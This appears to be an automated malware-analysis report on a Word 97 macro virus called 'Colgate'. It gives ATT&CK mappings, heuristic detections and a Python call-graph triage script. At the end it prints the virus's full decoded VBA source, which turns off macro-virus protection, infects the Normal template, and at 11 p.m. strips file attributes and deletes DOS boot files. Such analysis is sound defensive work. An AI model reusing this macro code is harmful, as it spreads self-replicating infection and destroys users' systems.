Verdict: MALICIOUS (risk score 280)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The recovered VBA source is a Word 97-era macro virus with a time-bombed destructive payload, not a downloader. AutoOpen, AutoClose and AutoSave all call makeit, which suppresses errors (On Error Resume Next), turns off Word's macro virus warning (Application.Options.VirusProtection = False) and the Normal-template save prompt, disables the Tools > Macro menu entry, and then copies the "colgate" module into NormalTemplate with Application.OrganizerCopy so that every document opened afterwards inherits it; the reverse direction (from an infected Normal template into a clean active document) goes through an exported c:\colgate.tmp that is imported and then deleted with Kill. The check intended to detect an already-infected Normal template compares line 2 of each module to the string 'colgate', which neither comment line in the visible module matches, so the copy is re-attempted on every trigger and any resulting error is silently swallowed. When the local hour is 23 (DatePart("h", Time) = 23), makeit calls doit: it disables Word's main command bars, runs Shell("C:\windows\command\attrib.exe -r -h -s C:\*.*") to strip the read-only, hidden and system attributes that would otherwise protect the boot files, then Kills C:\autoexec.bat, C:\IO.SYS, C:\MSDOS.SYS and C:\Command.com, leaving a Windows 9x/DOS host unbootable (ATT&CK T1485, Data Destruction). No network, download or secondary-payload logic is present in the recovered source; the Shell() call runs one fixed command, not attacker-supplied input. The Windows 9x attrib.exe path and the Word 97 object model date the sample; on NT-based Windows the Shell target and the DOS boot files do not exist, but the Normal-template infection logic still works wherever macros are allowed to run.
Heuristics (7)
- ClamAV: Doc.Trojan.Titch-6 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Titch-6
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro (the recovered source names the procedure AutoClose; an AutoSave handler is present as well)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
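The heuristics above key on auto-exec procedure names and execution tokens in the macro source, and the behaviour summary hinges on the call chain AutoOpen/AutoClose/AutoSave -> makeit -> doit -> Shell/Kill. The Python script below is an added example, not part of this report or of the analyzer, that performs the same triage on extracted VBA text: it finds procedures, builds a sub-to-sub call graph, and lists which dangerous identifiers are reachable from each auto-exec entry point together with the path that reaches them. The AUTO_EXEC and DANGEROUS tables, their severity labels, and the trimmed SAMPLE source are assumptions constructed here from the page's own listing.

```python
"""Static triage of extracted VBA source: auto-exec entry points, call graph,
and dangerous calls reachable from each entry point.  Added example; the
token tables and SAMPLE below are assumptions built from the page's listing."""
import re
from collections import deque

# Procedure names Word runs without a click (Word 97+ VBA names and the
# Document_* event handlers).  Assumed list; extend as needed.
AUTO_EXEC = {
    "autoopen", "autoclose", "autoexec", "autoexit", "autonew", "autosave",
    "document_open", "document_close", "document_new",
}

# identifier (lower-case) -> (label, severity).  Labels mirror the report's
# heuristic names where one exists; the others are assumed here.
DANGEROUS = {
    "shell": ("OLE_VBA_SHELL", "critical"),
    "kill": ("file-delete", "high"),
    "organizercopy": ("normal-template-infection", "high"),
    "createobject": ("object-execution", "high"),
    "virusprotection": ("macro-security-disabled", "high"),
}
DANGEROUS_TOKENS = set(DANGEROUS)

PROC_RE = re.compile(
    r"^[ \t]*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)\s*\([^)]*\)"
    r"(.*?)^[ \t]*End\s+(?:Sub|Function)",
    re.I | re.M | re.S,
)
STRING_RE = re.compile(r'"[^"\n]*"')
COMMENT_RE = re.compile(r"'[^\n]*")
IDENT_RE = re.compile(r"\b[A-Za-z_]\w*")


def strip_literals(code):
    """Blank string literals first (they may contain a quote char), then
    comments, so identifiers inside them are not counted as calls."""
    return COMMENT_RE.sub("", STRING_RE.sub('""', code))


def find_procedures(vba):
    """Map lower-cased procedure name -> set of lower-cased identifiers in its body."""
    procs = {}
    for m in PROC_RE.finditer(vba):
        body = strip_literals(m.group(2))
        procs[m.group(1).lower()] = {t.lower() for t in IDENT_RE.findall(body)}
    return procs


def triage(vba):
    """For each auto-exec entry point, walk the call graph (BFS) and collect
    dangerous identifiers in every reachable procedure.
    Returns {entry: [(token, label, severity, procedure, call_path), ...]}."""
    procs = find_procedures(vba)
    report = {}
    for entry in sorted(p for p in procs if p in AUTO_EXEC):
        findings, seen = [], {entry}
        queue = deque([(entry, [entry])])
        while queue:
            proc, path = queue.popleft()
            tokens = procs[proc]
            for tok in sorted(tokens & DANGEROUS_TOKENS):
                label, severity = DANGEROUS[tok]
                findings.append((tok, label, severity, proc, path))
            for callee in sorted(tokens & set(procs)):
                if callee not in seen:
                    seen.add(callee)
                    queue.append((callee, path + [callee]))
        report[entry] = findings
    return report


def verdict(report):
    """Worst severity reachable from any auto-exec entry point, or 'clean'."""
    order = ["clean", "medium", "high", "critical"]
    severities = [f[2] for findings in report.values() for f in findings]
    return max(severities, key=order.index, default="clean")


# Constructed, trimmed excerpt of the macro source shown on this page.
SAMPLE = r'''
Attribute VB_Name = "Colgate"
'Colgate.... badnews for a bad world
Sub makeit()
On Error Resume Next
Application.Options.VirusProtection = False
If Not gotit Then
Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "colgate", wdOrganizerObjectProjectItems
End If
Kill ("c:\colgate.tmp")
If DatePart("h", Time) = 23 Then
doit
End If
End Sub
Sub doit()
On Error Resume Next
Application.CommandBars("Tools").Enabled = False
dosit = Shell("C:\windows\command\attrib.exe -r -h -s C:\*.*")
Kill ("C:\autoexec.bat")
End Sub
Sub AutoClose()
On Error Resume Next
makeit
End Sub
Sub AutoOpen()
On Error Resume Next
makeit
End Sub
'''

if __name__ == "__main__":
    result = triage(SAMPLE)
    for entry, findings in result.items():
        for tok, label, severity, proc, path in findings:
            print(f"{entry}: {severity:8} {label:26} {tok} in {proc} via {' -> '.join(path)}")
    print("verdict:", verdict(result))
```

Run against the full macros.bas instead of SAMPLE, the same walk reports Kill from both makeit (the c:\colgate.tmp cleanup) and doit (the boot files), and flags VirusProtection as the defence-evasion step. Because the walk follows identifiers rather than parsed call syntax, a procedure named like a keyword would be over-reported; for triage that errs on the right side.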
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2500 bytes | e3c3e91189c73c8df8d045d3bcb902c49579c644b84dcaffe384df5b13bdf853 |

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Colgate"
'Colgate.... badnews for a bad world
'Using your computer L8@nite is bad for you
Sub makeit()
On Error Resume Next
Application.Options.VirusProtection = False
Application.Options.SaveNormalPrompt = False
Application.Options.ConfirmConversions = False
Application.CommandBars("Tools").Controls("Macro").Enabled = False
Dim mod_count As Integer
Dim gotit As Boolean
gotit = False
mod_count = 1
For mod_count = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents.Item(mod_count).CodeModule.Lines(2, 1) = "'colgate" Then gotit = True
Next mod_count
If Not gotit Then
Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "colgate", wdOrganizerObjectProjectItems
End If
If NormalTemplate.Saved = False Then NormalTemplate.Save
gotit = False
mod_count = 1
For mod_count = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents.Item(mod_count).CodeModule.Lines(1, 1) = "'Colgate.... badnews for a bad world" Then gotit = True
Next mod_count
If Not gotit Then
NormalTemplate.VBProject.VBComponents("colgate").Export ("c:\colgate.tmp")
ActiveDocument.VBProject.VBComponents.Import ("c:\colgate.tmp")
ActiveDocument.SaveAs ActiveDocument.FullName
Kill ("c:\colgate.tmp")
End If
If DatePart("h", Time) = 23 Then
doit
End If
End Sub
Sub doit()
On Error Resume Next
Dim dosit As Boolean
Application.CommandBars("File").Enabled = False
Application.CommandBars("Edit").Enabled = False
Application.CommandBars("View").Enabled = False
Application.CommandBars("Insert").Enabled = False
Application.CommandBars("Format").Enabled = False
Application.CommandBars("Tools").Enabled = False
Application.CommandBars("Table").Enabled = False
Application.CommandBars("Window").Enabled = False
Application.CommandBars("Help").Enabled = False
dosit = Shell("C:\windows\command\attrib.exe -r -h -s C:\*.*")
Kill ("C:\autoexec.bat")
Kill ("C:\IO.SYS")
Kill ("C:\MSDOS.SYS")
Kill ("C:\Command.com")
End Sub
Sub AutoClose()
On Error Resume Next
makeit
End Sub
Sub AutoSave()
On Error Resume Next
makeit
End Sub
Sub AutoOpen()
On Error Resume Next
makeit
End Sub
```